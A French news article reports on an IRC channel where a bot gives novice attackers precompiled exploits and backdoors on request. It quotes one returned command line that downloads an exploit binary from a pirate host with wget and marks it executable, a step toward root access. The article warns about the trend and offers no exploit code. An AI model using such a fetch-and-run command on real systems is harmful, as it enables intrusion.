Pour gérer vos consentements :

Pirates du dimanche et IRC font bon ménage

Publié par Arnaud Dimberton le - mis à jour à

L'on savait depuis un moment qu'il était possible de télécharger des programmes pour créer des virus ou bien de chercher sur Internet des instructions utiles pour un internaute fantasmant sur une future carrière de Hacker. Seulement selon le webzine Zataz.com il existe une autre alternative pour les Internautes en manque de neurones: le chan IRC (Internet Relay Chat)

Devenir un hacker sans mettre le nez dans le code, c'est possible ! Pour cela il faut accéder aux exploits et backdoors permettant le piratage.

Soit l'on se nomme Goldstein ou Paradox et on comprend aisément le code source de l'exploit utilisé, soit l'on est capable d'utiliser un exploit publié pour s'introduire chez la cible à pirater. Mais en ces temps de modernité il est possible, sans se fatiguer, de polluer un ennemi, un concurrent que sais-je? Et cela tout simplement, en récupérant sur un chan IRC les commandes à utiliser et l'exploit qui correspond ! L'équipe de Zataz.com a découvert un Channel ayant un bot (robot) d'une grande générosité. Ce lieu de discussion et d'échange a été mis en place par un pirate ayant soigneusement pris le temps d'infiltrer des serveurs Web sur lesquels il a placé des exploits publics ou privés qui permettent d'agir selon le mot clé spécifié. Interrogé par le webzine un utilisateur explique le fonctionnement : « Ils vont télécharger des versions compilées d'un exploit, et il ne reste plus qu'à l'exécuter. » Ainsi un utilisateur malveillant va taper une commande dans le channel par exemple !uselib ou !backdoor et ensuite il laisse travailler le bot qui va rechercher dans sa base de données s'il est en possession d'un exploit correspondant à la demande. Un service à la carte en quelque sorte. Ensuite il communique une ligne ressemblant à : « wgetwww.sitepirate.com/Odays/uselib; chmod 777 uselib » qui correspond au lieu de stockage de la bête et à la commande système pour lancer le téléchargement. Il est alors possible de changer les droits de l'exploit et de l ?exécuter. Une fois la ligne copiée le black hacker devient root c'est-à-dire qu'il est considéré comme l'administrateur de la machine cible. Cette nouvelle est inquiétante, car à force de mettre à la disposition de pirates néophytes et malintentionnés des binaires particulièrement redoutables, l'on risque de voir dans les années à venir une explosion de l'amateurisme dans le piratage. Une nouvelle qui va faire froid dans le dos des responsables de la sécurité des réseaux d'entreprise.

La rédaction vous recommande